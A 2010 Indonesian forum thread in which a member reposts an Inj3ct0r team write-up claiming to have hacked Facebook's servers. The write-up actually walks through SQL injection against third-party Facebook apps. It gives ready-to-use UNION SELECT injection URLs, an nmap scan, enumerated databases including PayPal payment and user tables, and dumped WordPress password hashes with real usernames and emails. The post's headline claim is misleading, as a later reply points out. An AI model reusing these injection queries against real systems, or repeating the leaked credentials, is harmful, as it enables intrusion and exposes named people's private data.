El-Farhatz
Jumlah posting : 60 Join date : 20.03.10 Lokasi : Bumi Allah
| Subyek: FaceBook's servers was hacked by Inj3ct0r team. Hack of the year! Tue Apr 06, 2010 8:09 pm | |
| Assalamualaikum , afwan lagi searching searching eksploit nemuin artikel kea gini dari situ inj3ct0r.com link eksploitnya ini : http://inj3ct0r.com/exploits/11638 kalo ada yang bisa njelasin ini kaka kaka ,, mohon penceranhannya wallahua'lam bisshowab ... ane nubi cupu cuman bisa kopas aja Akhukumfillah El-Farhatz - Quote :
================================================================= FaceBook's servers was hacked by Inj3ct0r team. Hack of the year! =================================================================
Original: http://inj3ct0r.com/exploits/11638
[+] English translation
Inj3ct0r official website => Inj3ct0r.com
__ __ ___ __ __ /'__`\ /\ \__ /'__`\ /\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___ \/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\ \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \ \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\ \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/ \ \____/ \/___/
[0x00] [Introduction] [0x01] [First impressions] [0x02] [Search for bugs] [0x03] [Inj3ct0r Crash Exploit] [0x04] [Conclusion] [0x05] [Greetz]
If you want to know the Inj3ct0r group, read: http://inj3ct0r.com/exploits/9845
__ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\ \/\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \ \ \ \_\ \/> </\ \ \_\ \ \ \_\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Introduction]
+ [En] => In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
We did not change the main page, do not sell backup server does not delete files.
We have demonstrated the flaw in the system. Start =] ..
__ __ _ /'__`\ /'__`\ /' \ /\ \/\ \ __ _/\ \/\ \/\_, \ \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ \ \ \_\ \/> </\ \ \_\ \ \ \ \ \ \____//\_/\_\\ \____/ \ \_\ \/___/ \//\/_/ \/___/ \/_/ [First impressions]
At first glance, FaceBook well protected social network. Scanning FaceBook server did not give nothing interesting ... )
..>
Initiating Parallel DNS resolution of 1 host. Completed Parallel DNS resolution of 1 host. Initiating SYN Stealth Scan Scanning facebook.com (69.63.181.11) [1000 ports] Discovered open port 443/tcp on 69.63.181.11 Discovered open port 80/tcp on 69.63.181.11 Completed SYN Stealth Scan 13.16s elapsed (1000 total ports) Initiating Service scan Scanning 2 services on facebook.com (69.63.181.11) Service scan Timing: About 50.00% done; ETC: Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host) NSE: Script scanning 69.63.181.11. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 22:41 Completed NSE at 22:41, 0.38s elapsed NSE: Script Scanning completed. Nmap scan report for facebook.com (69.63.181.11) Host is up (0.17s latency). Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11 rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https
go ahead .. =]
__ __ ___ /'__`\ /'__`\ /'___`\ /\ \/\ \ __ _/\ \/\ \/\_\ /\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__ \ \ \_\ \/> </\ \ \_\ \ // /_\ \ \ \____//\_/\_\\ \____//\______/ \/___/ \//\/_/ \/___/ \/_____/ [Search for bugs]
We use GoOgle.com
request: Facebook+Vulnerability [search]
We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities
but all this can be found by searching : http://inj3ct0r.com/search
All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com
request: site:facebook.com WARNING error
=\ *****...
Let us not lose heart) Hackers are not looking for easy ways
Visit Facebook.com
Let us search bugs in Web Apps.
https://www.facebook.com/robots.txt
oooooooooooooooooooooooooooo User-agent: * Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php
User-agent: Slurp Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php
User-agent: msnbot Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php
# E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied. Sitemap: https://www.facebook.com/sitemap.php 00000000000000000000000000000000
nothing interesting =\
https://apps.facebook.com/tvshowchat/
I looked closely, I noticed links
https://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability...
check:
https://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r
ooooooooooooooooooooooooooo
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
and other....
oooooooooooooooooooooooooooo
O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.
Writing exploits, I got the following: https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
ooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
5.0.45-log <= ALERT!!!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo
Database : adminclt_testsite Database User : adminclt_13@209.68.2.10 MySQL Version : 5.0.67-log
super = ] Now, we just can say that there is SQL Injection Vulnerability
https://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
Now we know that there is MySql 5.0.45-log
Then let's write another exploit to display tables with information_schema.tables:
https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
201 <= ALERT!!! 201 tables!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo
https://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]
Database : adminclt_testsite Database User : adminclt_13@209.68.2.10 MySQL Version : 5.0.67-log
1) AdCode 2) AdTrack 3) Admin_DataStore 4) Admin_User 5) Challenges 6) ChallengesCompleted 7) Comments ContactEmails 9) Content 10) ContentImages 11) FeaturedTemplate 12) FeaturedWidgets 13) Feeds 14) FolderLinks 15) Folders 16) ForumTopics 17) Log 18) LogDumps 19) Newswire 20) NotificationMessages 21) Notifications 22) Orders 23) OutboundMessages 24) Photos 25) Prizes 26) RawExtLinks 27) RawSessions 28) SessionLengths 29) Sites 30) Subscriptions 31) SurveyMonkeys 32) SystemStatus 33) Templates 34) User 35) UserBlogs 36) UserCollectives 37) UserInfo 38) UserInvites 39) Videos 40) WeeklyScores 41) Widgets 42) cronJobs 43) fbSessions
Admin_User
1) id 2) name 3) email 4) password 5) userid 6) ncUid 7) level
User
1) userid 2) ncUid 3) name 4) email 5) isAdmin 6) isBlocked 7) votePower remoteStatus 9) isMember 10) isModerator 11) isSponsor 12) isEmailVerified 13) isResearcher 14) acceptRules 15) optInStudy 16) optInEmail 17) optInProfile 18) optInFeed 19) optInSMS 20) dateRegistered 21) eligibility 22) cachedPointTotal 23) cachedPointsEarned 24) cachedPointsEarnedThisWeek 25) cachedPointsEarnedLastWeek 26) cachedStoriesPosted 27) cachedCommentsPosted 28) userLevel
https://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]
Current Database : signalpa_fbmFundRraise Database User : signalpa_rockaja@localhost MySQL Version : 5.0.85-community
DATABASE 1) information_schema 2) signalpa_CelebrityPuzzle 3) signalpa_EBF 4) signalpa_appNotification 5) signalpa_appnetwork 6) signalpa_dailyscriptures 7) signalpa_ebayfeed signalpa_fbmFundRraise 9) signalpa_fbmFundRraisebeta 10) signalpa_netcards 11) signalpa_paypal 12) signalpa_thepuzzle
signalpa_fbmFundRraise 1) Campaigns 2) Campaigns_Temp 3) FB_theme 4) IfundDollars 5) Languages 6) Payments 7) Paymentsoops Supporters 9) Users 10) Withdrawals 11) invites 12) invites_copy 13) mp_passwords 14) payment_codes 15) txt_codes 16) valid_servers 17) weeklyBonus
[+] Column: Users
1) id 2) name 3) email 4) mobile_no 5) address 6) country 7) password organisation 9) date_created 10) date_updated 11) status 12) facebook_id 13) isFacebookFan 14) verify 15) paypalUse 16) paypalEmail 17) bacUse 18) bacAcc 19) bacName 20) bacLocation 21) bacCountry 22) bacIBAN 23) bacSort_code 24) current_rank 25) new_rank 26) cronjob 27) max_fundraise
[+] Column: mp_passwords 1) id 2) password 3) username 4) status 5) number 6) rc 7) referer transID 9) currency 10) transType 11) amount 12) confirmed 13) date
signalpa_paypal 1) paypal_cart_info 2) paypal_payment_info 3) paypal_subscription_info
Column: paypal_cart_info 1) txnid 2) itemname 3) itemnumber 4) os0 5) on0 6) os1 7) on1 quantity 9) invoice 10) custom
[+] Column : paypal_payment_info 1) firstname 2) lastname 3) buyer_email 4) street 5) city 6) state 7) zipcode memo 9) itemname 10) itemnumber 11) os0 12) on0 13) os1 14) on1 15) quantity 16) paymentdate 17) paymenttype 18) txnid 19) mc_gross 20) mc_fee 21) paymentstatus 22) pendingreason 23) txntype 24) tax 25) mc_currency 26) reasoncode 27) custom 28) country 29) datecreation
https://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]
Current Database : tv Database User : tomkincaid@ps5008.dreamhost.com MySQL Version : 5.0.45-log
[+] DATABASES
1) information_schema 2) astro 3) candukincaid 4) cemeteries 5) churchwpdb 6) countdownapp 7) crush dare 9) friendiq 10) giants 11) hookup 12) jauntlet 13) loccus 14) luciacanduwp 15) maps 16) martisor 17) mediax 18) mostlikely 19) music 20) pimpfriends 21) plans 22) politicsapp 23) postergifts 24) posters2 25) projectbasecamp 26) pwnfriends 27) quiz 28) seeall 29) send 30) supporter 31) swapu 32) tomsapps 33) travelbug
[+] tab.send
1) app 2) item 3) itemforuser 4) neverblue 5) user
[+] Columns user(12454)
1) userid 2) siteid 3) appkey 4) session 5) points 6) added 7) removed
Tab. candukincaid
1) wp_comments 2) wp_links 3) wp_options 4) wp_post**** 5) wp_posts 6) wp_px_albumPhotos 7) wp_px_albums wp_px_galleries 9) wp_px_photos 10) wp_px_plugins 11) wp_term_relationships 12) wp_term_taxonomy 13) wp_terms 14) wp_user**** 15) wp_users
[+]Column wp_users
1) ID 2) user_login 3) user_pass 4) user_nicename 5) user_email 6) user_url 7) user_registered user_activation_key 9) user_status 10) display_name
etc...
I think we found a sufficient number of vulnerabilities!
__ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\_\L\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Inj3ct0r Crash Exploit]
So .. Moving on to the fun friends
To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =]
..> Inj3ct0rExploit start . + . + . + . + . + . + .
wp_posts
post_password
wp_users
user_pass
done.....
WordPress! oO one of the modules installed in facebook is Wordpress!
check link: https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
3 <= ALERT! Users! =]
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
oooooooooooooooooooooooooooo
..> Inj3ct0r_Crach_exploit [ENTER]
user:
admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
cracker:
admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com
see request:
https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1-- https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1-- https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
goOd =] Nice Hacking old school xD
__ __ __ __ /'__`\ /'__`\/\ \\ \ /\ \/\ \ __ _/\ \/\ \ \ \\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_ \ \ \_\ \/> </\ \ \_\ \ \__ ,__\ \ \____//\_/\_\\ \____/\/_/\_\_/ \/___/ \//\/_/ \/___/ \/_/ [Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)
__ __ ______ /'__`\ /'__`\/\ ___\ /\ \/\ \ __ _/\ \/\ \ \ \__/ \ \ \ \ \/\ \/'\ \ \ \ \ \___``\ \ \ \_\ \/> </\ \ \_\ \/\ \L\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Greetz]
Greetz all member Inj3ct0r.com
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go http://inj3ct0r.com/links =]
Personally:
0x1D, Z0m[b]!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX,
Andrew Horton ... You are good hackers. Respect y0u!
Farzin0123(Pianist) visit site : Ueg88.blogfa.com ! syukron you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!
At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook.zip
We want to syukron the following people for their contribution.
Do not forget to keep track of vulnerabilities in Inj3ct0r.com
GoOd luck Hackers! =]
# Inj3ct0r.com [2010-04-06]
| |
|
cyberkalashnikov
Jumlah posting : 118 Join date : 07.01.10 Lokasi : /bin/bash
| Subyek: Re: FaceBook's servers was hacked by Inj3ct0r team. Hack of the year! Thu Apr 08, 2010 7:30 am | |
| kayaknya cuma aplikasi kk... bukan server facebook nya langsung... | |
|
El-Farhatz
Jumlah posting : 60 Join date : 20.03.10 Lokasi : Bumi Allah
| Subyek: Re: FaceBook's servers was hacked by Inj3ct0r team. Hack of the year! Thu Apr 08, 2010 11:04 am | |
| hmmph.... naam akh . , ana ga paham jazakallah inpohnya akhukumfillah El-Farhatz | |
|
Sponsored content
| Subyek: Re: FaceBook's servers was hacked by Inj3ct0r team. Hack of the year! | |
| |
|